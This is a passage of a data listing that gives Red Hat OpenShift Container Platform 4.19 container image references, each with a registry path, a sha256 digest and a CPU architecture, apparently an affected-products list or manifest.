"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
